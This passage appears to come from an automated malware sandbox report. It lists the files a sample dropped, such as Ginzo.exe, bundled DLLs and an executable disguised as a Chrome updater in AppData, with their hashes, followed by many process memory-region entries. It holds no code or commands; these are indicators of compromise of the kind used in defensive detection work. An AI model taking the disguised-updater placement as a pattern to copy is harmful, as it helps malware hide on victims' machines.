SHA5121150c4d5d36d5a48ec3655b4195520d9facecdea1752f296dbb2935df5e226dbca712cee2c2dda07e28b9b261f09e82e9c10c1a381c240e491b896a6e93bd58f
-
C:\Users\Admin\AppData\Local\Temp\2.exeFilesize
365KB
MD548f7091e08fcc58eeb7bb58f2850f1d3
SHA1b73bbab490536322aab131e8aaa1e391bcce1ffd
SHA256f079eafd4b372fda5000c834c2c88e0d4146a046c02a01be6874f3c9ca0cc70b
SHA5121150c4d5d36d5a48ec3655b4195520d9facecdea1752f296dbb2935df5e226dbca712cee2c2dda07e28b9b261f09e82e9c10c1a381c240e491b896a6e93bd58f
-
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dllFilesize
461KB
MD5a999d7f3807564cc816c16f862a60bbe
SHA11ee724daaf70c6b0083bf589674b6f6d8427544f
SHA2568e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA5126f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dllFilesize
461KB
MD5a999d7f3807564cc816c16f862a60bbe
SHA11ee724daaf70c6b0083bf589674b6f6d8427544f
SHA2568e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA5126f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
C:\Users\Admin\AppData\Local\Temp\Ginzo.exeFilesize
184KB
MD5edd119f3785ff7cccb510298dbbfb727
SHA166bb31075d1d1d2a65b9cfe432a903a2275d4cd6
SHA2563052ac913610c1c75b357fc204c5c3025eda1cda7ed696bfea62be7f2718dab9
SHA512831bdc28dbd8e26ea96b4284d1c31f48aabb70cf5b02e4e269597cd86597c8aa317e77edf27de19bac54f87b5aa2b7a213796f943fefbc89704e1f059eeb8a1c
-
C:\Users\Admin\AppData\Local\Temp\Ginzo.exeFilesize
184KB
MD5edd119f3785ff7cccb510298dbbfb727
SHA166bb31075d1d1d2a65b9cfe432a903a2275d4cd6
SHA2563052ac913610c1c75b357fc204c5c3025eda1cda7ed696bfea62be7f2718dab9
SHA512831bdc28dbd8e26ea96b4284d1c31f48aabb70cf5b02e4e269597cd86597c8aa317e77edf27de19bac54f87b5aa2b7a213796f943fefbc89704e1f059eeb8a1c
-
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dllFilesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dllFilesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dllFilesize
384KB
MD555c797383dbbbfe93c0fe3215b99b8ec
SHA11b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA2565fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dllFilesize
384KB
MD555c797383dbbbfe93c0fe3215b99b8ec
SHA11b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA2565fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
C:\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dllFilesize
1.3MB
MD58be215abf1f36aa3d23555a671e7e3be
SHA1547d59580b7843f90aaca238012a8a0c886330e6
SHA25683f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae
SHA51238cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
memory/60-171-0x0000000000000000-mapping.dmp
-
memory/220-156-0x0000000000000000-mapping.dmp
-
memory/392-176-0x0000000000000000-mapping.dmp
-
memory/456-216-0x0000000000000000-mapping.dmp
-
memory/556-169-0x0000000000000000-mapping.dmp
-
memory/568-204-0x0000000000000000-mapping.dmp
-
memory/608-188-0x0000000000000000-mapping.dmp
-
memory/828-161-0x0000000000000000-mapping.dmp
-
memory/1048-168-0x0000000000000000-mapping.dmp
-
memory/1092-187-0x0000000000000000-mapping.dmp
-
memory/1208-203-0x0000000000000000-mapping.dmp
-
memory/1344-189-0x0000000000000000-mapping.dmp
-
memory/1360-228-0x0000000000000000-mapping.dmp
-
memory/1392-170-0x0000000000000000-mapping.dmp
-
memory/1404-160-0x00007FF8BF3F0000-0x00007FF8BFEB1000-memory.dmpFilesize
10.8MB
-
memory/1404-159-0x000002B3315E0000-0x000002B331A1E000-memory.dmpFilesize
4.2MB
-
memory/1424-194-0x0000000000000000-mapping.dmp
-
memory/1448-177-0x0000000000000000-mapping.dmp
-
memory/1552-218-0x0000000000000000-mapping.dmp
-
memory/1572-179-0x0000000000000000-mapping.dmp
-
memory/1732-139-0x0000000004AC0000-0x0000000004B52000-memory.dmpFilesize
584KB
-
memory/1732-137-0x0000000000080000-0x00000000000E2000-memory.dmpFilesize
392KB
-
memory/1732-138-0x0000000005070000-0x0000000005614000-memory.dmpFilesize
5.6MB
-
memory/1732-130-0x0000000000000000-mapping.dmp
-
memory/1732-140-0x0000000004A90000-0x0000000004A9A000-memory.dmpFilesize
40KB
-
memory/1760-173-0x0000000000000000-mapping.dmp
-
memory/1932-183-0x0000000000000000-mapping.dmp
-
memory/1960-229-0x0000000000000000-mapping.dmp
-
memory/2000-184-0x0000000000000000-mapping.dmp
-
memory/2044-167-0x0000000000000000-mapping.dmp
-
memory/2052-234-0x0000000000000000-mapping.dmp
-
memory/2092-209-0x0000000000000000-mapping.dmp
-
memory/2112-193-0x0000000000000000-mapping.dmp
-
memory/2176-225-0x0000000000000000-mapping.dmp
-
memory/2232-233-0x0000000000000000-mapping.dmp
-
memory/2388-165-0x0000000000000000-mapping.dmp
-
memory/2396-219-0x0000000000000000-mapping.dmp
-
memory/2684-221-0x0000000000000000-mapping.dmp
-
memory/2756-190-0x0000000000000000-mapping.dmp
-
memory/2804-213-0x00007FF8C0760000-0x00007FF8C1221000-memory.dmpFilesize
10.8MB
-
memory/2804-210-0x0000000000000000-mapping.dmp
-
memory/3028-214-0x0000000000000000-mapping.dmp
-
memory/3032-181-0x0000000000000000-mapping.dmp
-
memory/3216-191-0x0000000000000000-mapping.dmp
-
memory/3292-175-0x0000000000000000-mapping.dmp
-
memory/3440-199-0x0000000000000000-mapping.dmp
-
memory/3480-151-0x0000000009420000-0x000000000945C000-memory.dmpFilesize
240KB
-
memory/3480-152-0x000000000A200000-0x000000000A266000-memory.dmpFilesize
408KB
-
memory/3480-144-0x00000000062C0000-0x0000000006310000-memory.dmpFilesize
320KB
-
memory/3480-148-0x0000000006A40000-0x0000000006AA2000-memory.dmpFilesize
392KB
-
memory/3480-149-0x0000000009150000-0x0000000009312000-memory.dmpFilesize
1.8MB
-
memory/3480-145-0x00000000064E0000-0x0000000006502000-memory.dmpFilesize
136KB
-
memory/3480-136-0x0000000000A00000-0x0000000000A38000-memory.dmpFilesize
224KB
-
memory/3480-143-0x0000000006430000-0x00000000064E0000-memory.dmpFilesize
704KB
-
memory/3480-133-0x0000000000000000-mapping.dmp
-
memory/3480-155-0x000000000A270000-0x000000000A2EA000-memory.dmpFilesize
488KB
-
memory/3500-178-0x0000000000000000-mapping.dmp
-
memory/3512-232-0x0000000000000000-mapping.dmp
-
memory/3588-195-0x0000000000000000-mapping.dmp
-
memory/3636-224-0x0000000000400000-0x0000000000417000-memory.dmpFilesize
92KB
-
memory/3636-222-0x0000000000401BEA-mapping.dmp
-
memory/3636-220-0x0000000000400000-0x0000000000417000-memory.dmpFilesize
92KB
-
memory/3948-235-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/3948-236-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/3948-237-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/3948-238-0x0000000000390000-0x00000000003B0000-memory.dmpFilesize
128KB
-
memory/3956-166-0x0000000000000000-mapping.dmp
-
memory/4000-217-0x0000000000000000-mapping.dmp
-
memory/4004-180-0x0000000000000000-mapping.dmp
-
memory/4080-172-0x0000000000000000-mapping.dmp
-
memory/4132-182-0x0000000000000000-mapping.dmp
-
memory/4304-162-0x0000000000000000-mapping.dmp
-
memory/4304-163-0x000002A1D2010000-0x000002A1D2032000-memory.dmpFilesize
136KB
-
memory/4304-164-0x00007FF8BF3F0000-0x00007FF8BFEB1000-memory.dmpFilesize
10.8MB
-
memory/4344-186-0x0000000000000000-mapping.dmp
-
memory/4360-185-0x0000000000000000-mapping.dmp
-
memory/4496-215-0x0000000000000000-mapping.dmp
-
memory/4532-231-0x0000000000000000-mapping.dmp
-
memory/4568-226-0x0000000000000000-mapping.dmp
-
memory/4660-197-0x0000000000000000-mapping.dmp
-
memory/4684-200-0x0000000000000000-mapping.dmp
-
memory/4692-201-0x0000000000000000-mapping.dmp
-
memory/4824-227-0x000001F1C0A30000-0x000001F1C0A42000-memory.dmpFilesize
72KB
-
memory/4824-208-0x00007FF8C0760000-0x00007FF8C1221000-memory.dmpFilesize
10.8MB
-
memory/4940-192-0x0000000000000000-mapping.dmp
-
memory/4948-174-0x0000000000000000-mapping.dmp
-
memory/4952-202-0x0000000000000000-mapping.dmp
-
memory/5004-230-0x0000000000000000-mapping.dmp
-
memory/5040-198-0x0000000000000000-mapping.dmp
-
memory/5096-196-0x0000000000000000-mapping.dmp